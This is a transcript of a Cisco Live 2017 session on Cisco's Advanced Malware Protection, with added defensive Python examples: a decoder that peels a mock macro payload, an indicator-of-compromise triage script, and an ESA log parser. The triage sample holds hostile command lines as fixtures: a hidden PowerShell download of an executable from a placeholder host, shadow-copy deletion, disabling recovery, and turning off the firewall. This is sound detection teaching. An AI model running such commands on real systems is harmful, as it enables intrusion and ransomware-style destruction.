advanced malware protection - safeplus live berlin 2017/brkse… · advanced malware protection...

Posted on 29-May-2018

TRANSCRIPT

Advanced Malware Protection

Cisco Advanced Malware Protection [AMP] is designed to provide both defense and insight before, during, and after these breach attempts. If you have struggled with the point of exposure or the extent of a breach, this session will show how Cisco AMP helps to detect infections, understand scope, and initiate remediation for protected systems, no matter where they are at any moment.

© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public

Me …

Ivan BERLINSON

CISCO Advanced Threat Solutions

Southern Europe Security Engineer

Based in France

[email protected]

BRKSEC-2139 3


Does it protect their credit card account? Yes / No

"Visibility Everywhere and Continuous Monitoring is the Key!"

Today we will talk about
• Some facts about malware
• How AMP helps with malware prevention
• Prevention alone is not enough: go further with detection and remediation
• How AMP works (demonstration)
• Q&A

Today we will NOT talk about
• AMP setup and Threat Grid integration; see instead:
  • BRKSEC-2809 AMP Threat Grid integrations with Web, Email and Endpoint Security
  • LTRSEC-2200 Practicing Breach Detection and Mitigation with Cisco Advanced Security Portfolio (AMP, CTA, TG...)
• CTA details; see instead:
  • BRKSEC-2444 CTA - Detecting advanced malware with machine learning

Permanent innovation makes prevention a never-ending game

1. Cyber criminal organizations are like IT companies
2. Security companies innovate every day to protect you better
3. Cyber criminals innovate every day to breach you better

And thanks to financial efficiency, hackers can innovate every day

• Locky's victims per day*: 90,000
• Average ransom: 0.5 BTC to 1 BTC
• Ransom paid**: 2.9% of victims

Estimated ransom revenue: 1,093,590 $ / day, 32,807,700 $ / month (30 days), 393,692,400 $ / year (360 days)

*Forbes  **Talos "Angler Exposed" research

[Timeline figure: Locky V1 .locky, V2 .zepto, V3 .odin, alongside Dridex, 2015-2016]

Like multiple obfuscation hiding malicious behavior from point-in-time protection systems

[Diagram, reconstructed as a list]
• Receipt_123412.doc: VBA macro; launches Explorer.exe
• Inside the document: XOR-encoded payload, Base64-encoded payload, packed PE32; unpacked and executed by WinWord
• DLL dropped
• UAC bypass; kill and disable services
• Information stealing
• Encrypted C&C communication (RC4)
• Drop and execute Dridex payload
• Launches calc.exe; DLL dropped
• Encrypt regular files; leave how-to-decrypt instructions
• Disabling system recovery / backup deletion
• Self-propagation / lateral movement

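To show concretely why the layered container in the diagram above defeats a 1-to-1 hash signature, here is an added Python example; it is not code from the session or from Cisco. It builds a stand-in document macro carrying an XOR-encoded, Base64-encoded fake PE32 and then peels the layers the way an analyst does during static triage: extract the Base64 literal, decode it, recover the single-byte XOR key using the MZ/PE header as known plaintext, and hash every stage. Assumptions: the Base64 layer is the outer one and the XOR key is a single byte (the slide gives neither the layer order nor the key length); the macro text, the helper name RunPayload and the payload bytes are constructed for the example and stand in for nothing real.

```python
import base64
import hashlib
import re

# Constructed stand-in for the "packed PE32" stage: an MZ header whose
# e_lfanew field (offset 0x3C) points at a "PE\0\0" signature, then filler.
# It is not an executable and cannot run; it only carries the two markers
# that the key-recovery step below uses as known plaintext.
FAKE_PE32 = (
    b"MZ" + bytes(58)
    + (0x40).to_bytes(4, "little")          # e_lfanew -> offset 0x40
    + b"PE\x00\x00"
    + b"stand-in payload bytes, not real machine code " * 3
)


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the 'XOR encoded payload' layer of the diagram."""
    return bytes(b ^ key for b in data)


def build_container(payload: bytes, key: int) -> str:
    """Attacker side, used here only to construct samples: wrap the PE in the
    diagram's layers (XOR, then Base64, then a string literal inside a VBA
    macro). The macro text is a hypothetical illustration, not a real loader."""
    blob = base64.b64encode(xor_bytes(payload, key)).decode("ascii")
    return (
        "Sub AutoOpen()\n"
        "    Dim s As String\n"
        f'    s = "{blob}"\n'
        "    Call RunPayload(s)\n"      # hypothetical helper name
        "End Sub\n"
    )


def looks_like_pe(blob: bytes) -> bool:
    """True when blob has an MZ header whose e_lfanew lands on 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_xor_key(blob: bytes):
    """Brute-force the single-byte key; the PE header is the known plaintext."""
    for key in range(256):
        if looks_like_pe(xor_bytes(blob, key)):
            return key
    return None


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def peel_layers(macro_text: str) -> dict:
    """Analyst side: pull the Base64 literal out of the macro, decode it,
    recover the XOR key and return the SHA-256 of every stage."""
    m = re.search(r'"([A-Za-z0-9+/=]{40,})"', macro_text)
    if not m:
        raise ValueError("no Base64 literal found in macro")
    b64_layer = m.group(1)
    xor_layer = base64.b64decode(b64_layer)
    key = recover_xor_key(xor_layer)
    if key is None:
        raise ValueError("no single-byte XOR key yields a PE header")
    payload = xor_bytes(xor_layer, key)
    return {
        "container_sha256": sha256_hex(macro_text.encode()),
        "base64_layer_sha256": sha256_hex(b64_layer.encode()),
        "xor_layer_sha256": sha256_hex(xor_layer),
        "xor_key": key,
        "payload_sha256": sha256_hex(payload),
        "payload": payload,
    }


if __name__ == "__main__":
    # Same payload, two keys: the delivered documents hash differently, so a
    # 1-to-1 signature on one never matches the other, while the inner PE
    # hash is identical for both.
    for key in (0x5A, 0x21):
        stages = peel_layers(build_container(FAKE_PE32, key))
        print(f"key=0x{stages['xor_key']:02x} "
              f"container={stages['container_sha256'][:16]}... "
              f"payload={stages['payload_sha256'][:16]}...")
```

Running it with the two keys shows the point of the slide: the two delivered documents have different SHA-256 values, while the inner payload hash is the same, so a verdict reached on the payload (sandbox, behavioral or retrospective) is what carries over between variants; a hash of the container does not.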

And if Phase 1 is a success, then add new functions for more benefits

[Same diagram as the previous slide]

Malware is getting in. Prevention tools ALONE will never catch everything

Initial disposition = Clean. Actual disposition = Bad. Too late! Blind to the scope of compromise.

Point-in-time controls (AV, IPS): analysis stops after the initial inspection. AV efficacy rate: <65%.

Evasion techniques that defeat point-in-time inspection: sleep techniques, unknown protocols, encryption, polymorphism.


Advanced Malware Protection - Unified by Threat

Attached controls: Network (ISR, NGIPS, NGFW, Meraki MX), Email (ESA, CES), Web (WSA, CWS), Host (Endpoint)
AMP Cloud: receives file metadata from the attached controls


Detection engines (for your reference)

1-to-1 signatures
• SHA-256
• Cloud-enabled coverage
• Full signature database protection

Ethos engine**
• Generic signature engine
• Polymorphic variants of a threat

Spero engine*
• Machine learning
• Makes predictions based on application features
• Pipeline (diagram): customer data, feature vectors (featureprint), machine learning algorithm (decision trees), predictive model, hypothesis, disposition (clean / unknown / malware); labels and performance monitoring feed back into the model

*Network and endpoint only
**Endpoint only


Advanced Malware Protection - Unified by Threat

Attached controls: Network (ISR, NGIPS, NGFW, Meraki MX), Email (ESA, CES), Web (WSA, CWS), Host (Endpoint)
AMP Cloud: file metadata from the attached controls
Threat Grid: TI database, static & dynamic analysis; returns a threat score


Dynamic Analysis Engine – Cisco Threat Grid

• Unified malware analysis and threat intelligence platform (TIP)
• Proprietary static and dynamic analysis
• Human-readable behavior indicators
• Samples correlated with billions of artifacts
• Global / historical context on the threat landscape
• Threat intelligence feeds



Retrospective Engine

• Real time: an attached control sends a file reputation query to the AMP cloud and receives a response disposition (engines: SHA, Spero, Ethos, DFC); Threat Grid analysis feeds the same cloud
• Retrospective queue: files seen in the last 7 days are re-checked every hour
• Retrospective query (20 mn): returns any changed disposition


Advanced Malware Protection - Unified by Threat

Attached controls: Network (ISR, NGIPS, NGFW, Meraki MX), Email (ESA, CES), Web (WSA, CWS), Host (Endpoint)
AMP Cloud: file metadata from the attached controls
Threat Grid: TI database, static & dynamic analysis; returns a threat score
Also connected: Cognitive Threat Analytics, ISE, OpenDNS Umbrella


RET Report December 2016: Total Detections (for your reference)

Source         Detections
Total           5,322,833
Threat Grid       110,289
Talos           1,299,961
Third Party     3,834,207
Others             78,376

[Bar chart of the same data, with per-source percentages 75%/35%, 75%/36%, 57%/33%, 63%/32%]

Demo: AMP on ESA

• Block by AMP file reputation
• Block by AMP dynamic file analysis
• Detect by AMP retrospection

Endpoint Detection and Response (EDR)

• Detect security incidents
• Contain the incident at the endpoint, so that network traffic or process execution can be remotely controlled
• Investigate security incidents
• Remediate endpoints

http://blogs.cisco.com/security/endpoint-protection-platform-epp-vs-endpoint-detection-response-edr

Continuous monitoring and event recording; visibility and remote control on the endpoint.

To investigate a breach, you need to answer urgent questions. Is there a breach and what happened?

Indications of compromise to detect/block the breach (100+), produced by:
• Vulnerability assessment
• Behavioral analysis
• Reputation check
• Low prevalence
• Dynamic analysis
• Command line capture
• Tetra AV engine

Example indications: Adobe Reader / Word / PowerPoint / Excel / QuickTime / Java etc. compromise; threat executed; threat quarantined; potential dropper; PowerShell downloaded executable; possible ransomware shadow copy deletion; netsh firewall disable.

More than 100 behaviors monitored!

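The indications listed above are behavioral: they fire on what a process does and who spawned it, not on a hash. As an added example (not Cisco's IOC engine or its rule set), the Python below runs a handful of command-line rules of the same kind over a constructed set of process events and walks the parent chain back to the Office document, which is the "what happened" an investigator needs. The event layout, process IDs, host, file paths and the URL are invented for the example; the rules are my own regular expressions, not AMP's, and they are deliberately narrow so that the benign "vssadmin list shadows" and notepad events in the sample do not fire.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    ts: str        # ISO-8601 timestamp
    pid: int
    ppid: int      # parent pid; the parent may predate the sample
    image: str     # executable name, lower-cased by the (hypothetical) agent
    cmdline: str


# Constructed sample of endpoint process events (not from the slides or any
# real capture). The chain mirrors the deck's story: Word spawns Explorer,
# which spawns PowerShell, which fetches and runs a dropper that then kills
# shadow copies, recovery and the firewall. The last two events are benign.
SAMPLE_EVENTS = [
    ProcessEvent("2017-02-14T10:51:40", 4000, 3000, "winword.exe",
                 'WINWORD.EXE /n "Receipt_123412.doc"'),
    ProcessEvent("2017-02-14T10:52:01", 4120, 4000, "explorer.exe", "explorer.exe"),
    ProcessEvent("2017-02-14T10:52:03", 4188, 4120, "powershell.exe",
                 "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                 ".DownloadFile('http://example.invalid/spoolup8.exe',"
                 "'C:\\Users\\Public\\spoolup8.exe')\""),
    ProcessEvent("2017-02-14T10:52:09", 4210, 4188, "spoolup8.exe",
                 "C:\\Users\\Public\\spoolup8.exe"),
    ProcessEvent("2017-02-14T10:52:11", 4230, 4210, "vssadmin.exe",
                 "vssadmin.exe delete shadows /all /quiet"),
    ProcessEvent("2017-02-14T10:52:12", 4236, 4210, "bcdedit.exe",
                 "bcdedit /set {default} recoveryenabled no"),
    ProcessEvent("2017-02-14T10:52:14", 4240, 4210, "netsh.exe",
                 "netsh advfirewall set allprofiles state off"),
    ProcessEvent("2017-02-14T10:55:00", 4300, 3000, "notepad.exe",
                 "notepad.exe C:\\Users\\bob\\notes.txt"),
    ProcessEvent("2017-02-14T10:56:00", 4310, 3000, "vssadmin.exe",
                 "vssadmin list shadows"),
]

# (indicator name, regex over the command line, optional regex over the
# parent image). Names follow the wording on the slide; patterns are mine.
INDICATORS = [
    ("PowerShell downloaded executable",
     re.compile(r"powershell.*(DownloadFile|DownloadString|Invoke-WebRequest|"
                r"iwr\b|wget\b).*\.exe", re.I), None),
    ("Possible ransomware shadow copy deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic.*shadowcopy\s+delete",
                re.I), None),
    ("Disabling system recovery",
     re.compile(r"bcdedit.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)",
                re.I), None),
    ("Netsh firewall disable",
     re.compile(r"netsh\s+(advfirewall\s+set\s+\w+\s+state\s+off|"
                r"firewall\s+set\s+opmode\s+(mode=)?disable)", re.I), None),
    ("Office application spawned shell/Explorer",
     re.compile(r"^(explorer|cmd|powershell|wscript|cscript)(\.exe)?\b", re.I),
     re.compile(r"^(winword|excel|powerpnt|outlook)\.exe$", re.I)),
]


def lineage(events, pid):
    """Image names from pid up to the oldest ancestor present in the events."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain


def triage(events):
    """Run every indicator over every event; each hit carries the process
    lineage so the analyst sees the dropper chain, not just the last process."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in sorted(events, key=lambda e: e.ts):
        parent = by_pid.get(ev.ppid)
        for name, cmd_rx, parent_rx in INDICATORS:
            if not cmd_rx.search(ev.cmdline):
                continue
            if parent_rx and (parent is None or not parent_rx.match(parent.image)):
                continue
            hits.append({"ts": ev.ts, "pid": ev.pid, "image": ev.image,
                         "indicator": name, "lineage": lineage(events, ev.pid)})
    return hits


if __name__ == "__main__":
    for h in triage(SAMPLE_EVENTS):
        print(f"{h['ts']} pid={h['pid']:<5} {h['indicator']:<42} "
              + " <- ".join(h["lineage"]))
```

Every hit in the sample traces back to winword.exe, which is the answer to "where did it come from": the document, not the PowerShell process that happened to be visible last.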

Is there a breach and what happened?

Device Flow Correlation [DFC]
• Records per connection: timestamp, device IP/port/protocol, destination IP/port/protocol, URLs / domains, file downloads
• Matched in real time against Cisco-provided intelligence and custom-defined lists
• Action: alert, or block / terminate the process

Cognitive Threat Analytics [CTA]
• Processes Cisco WSA, Cisco CWS and Blue Coat logs

To investigate a breach, you need to answer urgent questions.

To investigate a breach, you need to answer urgent questions: Is there a breach and what happened? Where did the malware come from and where has it been? What is it doing?

[Investigation walkthrough slides (screenshots)]

And you need to remediate

Is there a breach and what happened? Where did the malware come from and where has it been? What is it doing? How do we stop it?

Granular remediation and remote control
• Simple hash block
• Advanced signature (ClamAV)
• Application blocking
• Network communication blocking
• Host isolation
• Network/VLAN isolation
• Host/user privilege revocation


Demo: AMP on Endpoints

Malicious behaviors detected on an endpoint; investigation and remediation

Q & A


Complete Your Online Session Evaluation

Don’t forget: Cisco Live sessions will be available for viewing on-demand after the event at CiscoLive.com/Online

• Please complete your Online Session Evaluations after each session

• Complete 4 Session Evaluations & the Overall Conference Evaluation (available from Thursday) to receive your Cisco Live T-shirt

• All surveys can be completed via the Cisco Live Mobile App or the Communication Stations


Continue Your Education

• Lunch & Learn

• Meet the Engineer 1:1 meetings

• BRKSEC-2809 AMP Threat Grid integrations with Web, Email and Endpoint Security

• LTRSEC-2200 Practicing Breach Detection and Mitigation with Cisco Advanced Security Portfolio (AMP, CTA, TG...)

• BRKSEC-2444 Detecting advanced malware with machine learning


Thank You

“Logic will get you from point A to B,

Imagination will take you Everywhere”

- Albert Einstein

Demo Screenshots

Demonstration AMP on ESA: block by AMP file reputation, block by AMP dynamic file analysis, detect by AMP retrospection.


ESA AMP log for neup.exe (MID 423):

Tue Feb 14 12:26:07 2017 Info: Response received for file reputation query from Cloud. File Name = 'neup.exe', MID = 423, Disposition = FILE UNKNOWN, sha256 = e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497…., upload_action = 1
Tue Feb 14 12:26:16 2017 Info: File uploaded for analysis. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, file name: neup.exe
Tue Feb 14 12:36:31 2017 Info: File Analysis complete. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, File name: neup.exe, Disposition: 3 Score: 95, Spyname:[W32.E05774DA61-95.SBX.TG]
Tue Feb 14 12:36:31 2017 Info: Response received for file reputation query from Cache. File Name = 'neup.exe', MID = 423, Disposition = MALICIOUS, sha256 = e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497…., upload_action = 2
Tue Feb 14 13:52:03 2017 Info: Retrospective verdict received. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, Verdict: MALICIOUS, Reputation Score: 0, Spyname: W32.E05774DA61-95.SBX.TG


ESA AMP log for spoolup8.exe (MID 401):

Tue Feb 14 10:42:07 2017 Info: Response received for file reputation query from Cloud. File Name = spoolup8.exe, MID = 401, Disposition = FILE UNKNOWN, sha256 = 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a…, upload_action = 1
Tue Feb 14 10:42:10 2017 Info: File uploaded for analysis. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a1e604bf80, file name: spoolup8.exe
Tue Feb 14 10:51:32 2017 Info: File Analysis complete. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a1e604bf80, File name: spoolup8.exe, Disposition: 1 Score: 56,
Tue Feb 14 10:51:32 2017 Info: Response received for file reputation query from Cache. File Name = 'spoolup8.exe', MID = 401, Disposition = FILE UNKNOWN, sha256 = 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a…., upload_action = 2
Tue Feb 14 12:52:02 2017 Info: Retrospective verdict received. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a….., Timestamp: 1487073121.71, Verdict: MALICIOUS, Reputation Score: 0, Spyname: W32.94D523DC03-73.SBX.VIOC
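The retrospective engine slide and the two ESA log excerpts above describe one sequence: reputation lookup, sandbox upload, analysis result and, later, a retrospective verdict. As an added example (not code from the session or an official ESA tool), the Python below parses log lines in that format and reports the files whose retrospective verdict differs from the disposition the ESA acted on at delivery time, which is the "initial disposition clean, actual disposition bad" case from earlier in the deck. The log text is reconstructed from the excerpts, with the hashes the slides truncate written out using the full value printed elsewhere on the same slide; the regular expressions are my reading of the visible lines, not an ESA log grammar, and the analysis disposition codes are parsed as-is without assigning them a meaning.

```python
import re
from datetime import datetime

# ESA AMP log lines in the format shown on the two demo slides, reconstructed
# from those excerpts (truncated hashes written out in full from the same
# slide). Sample input for this example, not a live capture.
ESA_LOG = """\
Tue Feb 14 10:42:07 2017 Info: Response received for file reputation query from Cloud. File Name = spoolup8.exe, MID = 401, Disposition = FILE UNKNOWN, sha256 = 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a1e604bf80, upload_action = 1
Tue Feb 14 10:42:10 2017 Info: File uploaded for analysis. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a1e604bf80, file name: spoolup8.exe
Tue Feb 14 10:51:32 2017 Info: File Analysis complete. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a1e604bf80, File name: spoolup8.exe, Disposition: 1 Score: 56,
Tue Feb 14 10:51:32 2017 Info: Response received for file reputation query from Cache. File Name = 'spoolup8.exe', MID = 401, Disposition = FILE UNKNOWN, sha256 = 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a1e604bf80, upload_action = 2
Tue Feb 14 12:26:07 2017 Info: Response received for file reputation query from Cloud. File Name = 'neup.exe', MID = 423, Disposition = FILE UNKNOWN, sha256 = e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, upload_action = 1
Tue Feb 14 12:26:16 2017 Info: File uploaded for analysis. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, file name: neup.exe
Tue Feb 14 12:36:31 2017 Info: File Analysis complete. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, File name: neup.exe, Disposition: 3 Score: 95, Spyname:[W32.E05774DA61-95.SBX.TG]
Tue Feb 14 12:36:31 2017 Info: Response received for file reputation query from Cache. File Name = 'neup.exe', MID = 423, Disposition = MALICIOUS, sha256 = e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, upload_action = 2
Tue Feb 14 12:52:02 2017 Info: Retrospective verdict received. SHA256: 94d523dc0387f40fb54bfc34d942d9ac513629e25cbb9a3952da09a1e604bf80, Timestamp: 1487073121.71, Verdict: MALICIOUS, Reputation Score: 0, Spyname: W32.94D523DC03-73.SBX.VIOC
Tue Feb 14 13:52:03 2017 Info: Retrospective verdict received. SHA256: e05774da610783d7fcc5d15e000480f8b3f42b47a022b10d74216d1497027a35, Verdict: MALICIOUS, Reputation Score: 0, Spyname: W32.E05774DA61-95.SBX.TG
"""

TS_RE = re.compile(r"^(?P<ts>\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4}) Info: ")

# One pattern per event type seen in the excerpts; every pattern captures the
# SHA-256 so events can be grouped per file.
EVENT_RES = {
    "reputation": re.compile(
        r"Response received for file reputation query from (?P<source>\w+)\. "
        r"File Name = '?(?P<name>[^',]+)'?, MID = (?P<mid>\d+), "
        r"Disposition = (?P<disp>[A-Z ]+), sha256 = (?P<sha>[0-9a-f]+)"),
    "upload": re.compile(
        r"File uploaded for analysis\. SHA256: (?P<sha>[0-9a-f]+), file name: (?P<name>\S+)"),
    "analysis": re.compile(
        r"File Analysis complete\. SHA256: (?P<sha>[0-9a-f]+), File name: (?P<name>[^,]+), "
        r"Disposition: (?P<code>\d+) Score: (?P<score>\d+)"),
    "retrospective": re.compile(
        r"Retrospective verdict received\. SHA256: (?P<sha>[0-9a-f]+),.*?Verdict: (?P<verdict>[A-Z]+)"),
}


def parse_events(log_text):
    """One dict per recognised line: timestamp, event kind and the named fields."""
    events = []
    for line in log_text.splitlines():
        head = TS_RE.match(line)
        if not head:
            continue
        ts = datetime.strptime(head.group("ts"), "%a %b %d %H:%M:%S %Y")
        body = line[head.end():]
        for kind, rx in EVENT_RES.items():
            m = rx.search(body)
            if m:
                events.append({"ts": ts, "kind": kind, **m.groupdict()})
                break
    return events


def retrospective_alerts(log_text):
    """Files whose retrospective verdict differs from the last reputation answer
    the ESA acted on. Those messages already reached a mailbox and need incident
    response; a file that was already MALICIOUS at delivery time is skipped,
    since its retrospective verdict only confirms a block that happened."""
    by_sha = {}
    for ev in parse_events(log_text):
        by_sha.setdefault(ev["sha"], []).append(ev)
    alerts = []
    for sha, evs in by_sha.items():
        reps = [e for e in evs if e["kind"] == "reputation"]
        retros = [e for e in evs if e["kind"] == "retrospective"]
        scores = [e for e in evs if e["kind"] == "analysis"]
        if not reps or not retros:
            continue
        delivered, retro = reps[-1], retros[-1]
        if delivered["disp"] == retro["verdict"]:
            continue
        alerts.append({
            "sha256": sha,
            "file": delivered["name"],
            "mid": delivered["mid"],
            "delivered_as": delivered["disp"],
            "analysis_score": int(scores[-1]["score"]) if scores else None,
            "verdict": retro["verdict"],
            "dwell_minutes": (retro["ts"] - delivered["ts"]).total_seconds() / 60,
        })
    return alerts


if __name__ == "__main__":
    for a in retrospective_alerts(ESA_LOG):
        print(f"MID {a['mid']} {a['file']}: delivered as {a['delivered_as']} "
              f"(sandbox score {a['analysis_score']}), verdict {a['verdict']} "
              f"{a['dwell_minutes']:.0f} min later")
```

On this input only spoolup8.exe is reported: it was delivered with disposition FILE UNKNOWN after a sandbox score of 56 and flagged MALICIOUS about two hours later, so MID 401 is the message to chase. neup.exe is not reported, because its cached disposition flipped to MALICIOUS once analysis completed (score 95), before delivery, and the later retrospective verdict only confirms that block.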


AMP on Endpoints

Malicious Behaviors detected on an Endpoint

Investigation and Remediation
